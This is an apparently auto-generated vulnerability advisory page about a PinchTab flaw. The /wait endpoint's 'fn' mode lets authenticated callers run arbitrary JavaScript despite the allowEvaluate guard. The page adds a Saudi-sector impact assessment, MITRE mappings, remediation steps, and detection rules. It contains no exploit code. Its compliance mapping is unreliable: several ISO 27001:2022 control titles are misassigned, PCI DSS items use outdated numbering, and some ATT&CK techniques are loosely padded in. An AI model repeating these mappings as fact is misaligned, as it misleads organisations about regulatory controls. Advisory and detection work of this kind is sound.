📄 Description (English)
PinchTab is a standalone HTTP server that gives AI agents direct control over a Chrome browser. PinchTab `v0.8.3` through `v0.8.5` allow arbitrary JavaScript execution through `POST /wait` and `POST /tabs/{id}/wait` when the request uses `fn` mode, even if `security.allowEvaluate` is disabled. `POST /evaluate` correctly enforces the `security.allowEvaluate` guard, which is disabled by default. However, in the affected releases, `POST /wait` accepted a user-controlled `fn` expression, embedded it directly into executable JavaScript, and evaluated it in the browser context without checking the same policy. This is a security-policy bypass rather than a separate authentication bypass. Exploitation still requires authenticated API access, but a caller with the server token can execute arbitrary JavaScript in a tab context even when the operator explicitly disabled JavaScript evaluation. The current worktree fixes this by applying the same policy boundary to `fn` mode in `/wait` that already exists on `/evaluate`, while preserving the non-code wait modes. As of time of publication, a patched version is not yet available.
🤖 AI Executive Summary
PinchTab versions 0.8.3-0.8.5 contain a critical security policy bypass allowing authenticated users to execute arbitrary JavaScript in browser contexts via the /wait endpoint, circumventing the security.allowEvaluate restriction. This vulnerability affects AI agent control systems and automation platforms that rely on PinchTab for browser automation. Exploitation requires valid API authentication but completely bypasses intended security controls, making this a high-priority issue for organizations using PinchTab in production environments.
📄 Description (Arabic)
🤖 AI Intelligence Analysis Analyzed: Apr 23, 2026 05:21
🇸🇦 Saudi Arabia Impact Assessment
Saudi organizations using PinchTab for AI-driven automation, particularly in banking (SAMA-regulated fintech platforms), government digital transformation initiatives (NCA oversight), and enterprise automation face significant risk. Financial institutions using PinchTab for automated trading, compliance monitoring, or customer service automation could experience unauthorized access to sensitive financial data and transaction systems. Government agencies leveraging AI agents for document processing or citizen services could face data exfiltration and system compromise. Telecommunications companies (STC, Mobily) using browser automation for network management or customer analytics are at risk. The vulnerability is particularly dangerous because it bypasses explicit security policy configurations, suggesting attackers with valid tokens can escalate privileges beyond intended scope.
🏢 Affected Saudi Sectors
Banking and Financial Services
Government and Public Administration
Healthcare and Medical Services
Energy and Utilities
Telecommunications
Insurance
E-commerce and Retail
Manufacturing and Industrial Automation
Education and Research
Real Estate and Property Management
🎯 MITRE ATT&CK Techniques
T1059.007 - Command and Scripting Interpreter: JavaScript
T1548 - Abuse Elevation Control Mechanism (security policy bypass)
T1190 - Exploit Public-Facing Application (if PinchTab exposed)
T1110 - Brute Force (API token enumeration)
T1078 - Valid Accounts (authenticated API access abuse)
T1021 - Remote Services (browser automation for lateral movement)
T1005 - Data from Local System (browser context data access)
T1041 - Exfiltration Over C2 Channel (data exfiltration via JavaScript)
T1087 - Account Discovery (enumeration via browser automation)
T1010 - Application Window Discovery (browser tab enumeration)
T1518 - Software Discovery (system reconnaissance via JavaScript)
T1082 - System Information Discovery (environment enumeration)
T1083 - File and Directory Discovery (filesystem access via JavaScript)
T1213 - Data from Information Repositories (access to stored data)
T1557 - Man-in-the-Middle (potential MITM if tokens intercepted)
⚖️ Saudi Risk Score (AI)
8.2
/ 10.0
🔧 Remediation Steps (English)
IMMEDIATE ACTIONS:
1. Identify all PinchTab instances running versions 0.8.3-0.8.5 across your infrastructure
2. Disable or restrict network access to affected PinchTab servers immediately
3. Audit API token usage and revoke any suspicious or unnecessary tokens
4. Review browser automation logs for suspicious /wait endpoint calls with 'fn' parameters
5. Isolate affected systems from production networks if possible
PATCHING GUIDANCE:
1. Monitor PinchTab GitHub repository and official channels for patched version release
2. Prepare upgrade plan to patched version immediately upon availability
3. Test patched version in isolated environment before production deployment
4. Implement staged rollout to minimize service disruption
COMPENSATING CONTROLS (until patch available):
1. Implement network-level access controls restricting /wait endpoint access
2. Deploy WAF rules to block POST requests to /wait and /tabs/{id}/wait containing 'fn' parameters
3. Enforce strict API token management with short expiration times and minimal scope
4. Implement comprehensive logging and alerting on all /wait endpoint calls
5. Use network segmentation to isolate PinchTab servers from sensitive systems
6. Disable PinchTab instances not actively required for operations
DETECTION RULES:
1. Alert on POST requests to /wait or /tabs/*/wait endpoints containing 'fn' parameter
2. Monitor for unusual JavaScript patterns in fn parameters (eval, Function, setTimeout, etc.)
3. Track API token usage patterns and alert on tokens making /wait calls when /evaluate is disabled
4. Log all browser context executions and correlate with /wait endpoint calls
5. Monitor for data exfiltration attempts from browser contexts following /wait calls
🔧 خطوات المعالجة (العربية)
الإجراءات الفورية:
1. تحديد جميع مثيلات PinchTab التي تعمل بالإصدارات 0.8.3-0.8.5 عبر البنية التحتية
2. تعطيل أو تقييد الوصول إلى الشبكة لخوادم PinchTab المتأثرة فوراً
3. تدقيق استخدام رموز API وإلغاء أي رموز مريبة أو غير ضرورية
4. مراجعة سجلات أتمتة المتصفح للبحث عن استدعاءات مريبة لنقطة نهاية /wait مع معاملات 'fn'
5. عزل الأنظمة المتأثرة عن شبكات الإنتاج إن أمكن
إرشادات التصحيح:
1. مراقبة مستودع PinchTab GitHub والقنوات الرسمية لإصدار نسخة مصححة
2. تحضير خطة ترقية للنسخة المصححة فوراً عند توفرها
3. اختبار النسخة المصححة في بيئة معزولة قبل نشر الإنتاج
4. تنفيذ طرح مرحلي لتقليل انقطاع الخدمة
الضوابط التعويضية (حتى توفر التصحيح):
1. تنفيذ ضوابط الوصول على مستوى الشبكة لتقييد الوصول إلى نقطة نهاية /wait
2. نشر قواعد WAF لحظر طلبات POST إلى /wait و /tabs/{id}/wait التي تحتوي على معاملات 'fn'
3. فرض إدارة صارمة لرموز API مع أوقات انتهاء قصيرة والحد الأدنى من النطاق
4. تنفيذ تسجيل شامل والتنبيه على جميع استدعاءات نقطة نهاية /wait
5. استخدام تقسيم الشبكة لعزل خوادم PinchTab عن الأنظمة الحساسة
6. تعطيل مثيلات PinchTab غير المطلوبة بنشاط للعمليات
قواعد الكشف:
1. التنبيه على طلبات POST إلى نقاط نهاية /wait أو /tabs/*/wait التي تحتوي على معامل 'fn'
2. مراقبة أنماط JavaScript غير العادية في معاملات fn (eval, Function, setTimeout, إلخ)
3. تتبع أنماط استخدام رموز API والتنبيه على الرموز التي تقوم بـ /wait عندما يكون /evaluate معطلاً
4. تسجيل جميع عمليات تنفيذ سياق المتصفح والربط مع استدعاءات نقطة نهاية /wait
5. مراقبة محاولات تسرب البيانات من سياقات المتصفح بعد استدعاءات /wait
📋 Regulatory Compliance Mapping
🟢 NCA ECC 2024
ECC 2024 A.5.1.1 - Access Control Policy (API token management and scope enforcement)
ECC 2024 A.5.2.1 - User Registration and Access Management (token lifecycle management)
ECC 2024 A.6.1.1 - Information Security Policies and Procedures (security policy bypass)
ECC 2024 A.6.2.1 - Information Security Responsibilities (configuration security)
ECC 2024 A.7.1.1 - Cryptography Controls (secure token handling)
ECC 2024 A.8.1.1 - Audit Logging (detection and monitoring of exploitation attempts)
ECC 2024 A.8.2.1 - Monitoring and Review (real-time alerting on policy violations)
🔵 SAMA CSF
SAMA CSF Governance - Policy and Risk Management (security policy enforcement)
SAMA CSF Identification - Asset Management (inventory of PinchTab deployments)
SAMA CSF Protection - Access Control (API authentication and authorization)
SAMA CSF Protection - Data Security (JavaScript execution in sensitive contexts)
SAMA CSF Detection - Monitoring and Alerting (detection of /wait endpoint abuse)
SAMA CSF Response - Incident Management (response procedures for exploitation)
🟡 ISO 27001:2022
ISO 27001:2022 A.5.1 - Policies for Information Security (security policy bypass)
ISO 27001:2022 A.5.2 - Information Security Roles and Responsibilities (configuration management)
ISO 27001:2022 A.5.3 - Segregation of Duties (API token scope enforcement)
ISO 27001:2022 A.6.1 - Screening (secure token issuance and management)
ISO 27001:2022 A.6.2 - Terms and Conditions of Employment (acceptable use of automation tools)
ISO 27001:2022 A.7.1 - Physical and Environmental Security (network segmentation)
ISO 27001:2022 A.8.1 - User Endpoint Devices (browser automation security)
ISO 27001:2022 A.8.2 - Privileged Access Rights (API token privileges)
ISO 27001:2022 A.8.3 - Information Access Restriction (execution context isolation)
ISO 27001:2022 A.8.4 - Access to Cryptographic Keys (token security)
ISO 27001:2022 A.8.5 - Authentication (API authentication enforcement)
ISO 27001:2022 A.8.6 - Capacity Management (resource isolation)
ISO 27001:2022 A.8.7 - Human Resource Security (token usage monitoring)
ISO 27001:2022 A.8.8 - Supplier Relationships (third-party automation tool security)
ISO 27001:2022 A.8.9 - Information Security Event Logging (comprehensive audit logging)
ISO 27001:2022 A.8.10 - Monitoring, Review and Change Management (continuous monitoring)
ISO 27001:2022 A.8.11 - Removal or Reuse of Information Assets (secure token revocation)
ISO 27001:2022 A.8.12 - Data Leakage Prevention (context isolation and data protection)
ISO 27001:2022 A.8.13 - Handling of Assets (secure configuration management)
ISO 27001:2022 A.8.14 - Acceptable Use of Assets (API usage policies)
ISO 27001:2022 A.8.15 - Clear Desk and Clear Screen (browser context isolation)
ISO 27001:2022 A.8.16 - Security of Synchronization, Backup and Recovery (state management)
🟣 PCI DSS v4.0.1
PCI DSS 1.1 - Firewall Configuration Standards (network access controls to /wait endpoint)
PCI DSS 2.1 - Default Security Parameters (security.allowEvaluate configuration)
PCI DSS 2.2 - Configuration Standards (secure PinchTab configuration)
PCI DSS 2.4 - Security Configuration Documentation (policy documentation)
PCI DSS 3.2 - Secure Cryptographic Key Management (API token security)
PCI DSS 6.2 - Security Patches (patch management for PinchTab)
PCI DSS 6.5.1 - Injection Flaws (arbitrary code execution prevention)
PCI DSS 7.1 - Access Control Implementation (API token scope)
PCI DSS 8.1 - User Identification and Authentication (API authentication)
PCI DSS 8.2 - User Authentication (token-based authentication)
PCI DSS 8.5 - Access Control for Cardholder Data (execution context isolation)
PCI DSS 10.1 - Audit Logging (comprehensive logging of /wait calls)
PCI DSS 10.2 - User Activity Logging (API usage tracking)
PCI DSS 10.3 - Logging of Access to Audit Trails (log protection)
PCI DSS 11.3 - Penetration Testing (testing for policy bypass vulnerabilities)
📦 Affected Products / CPE 1 entries
pinchtab:pinchtab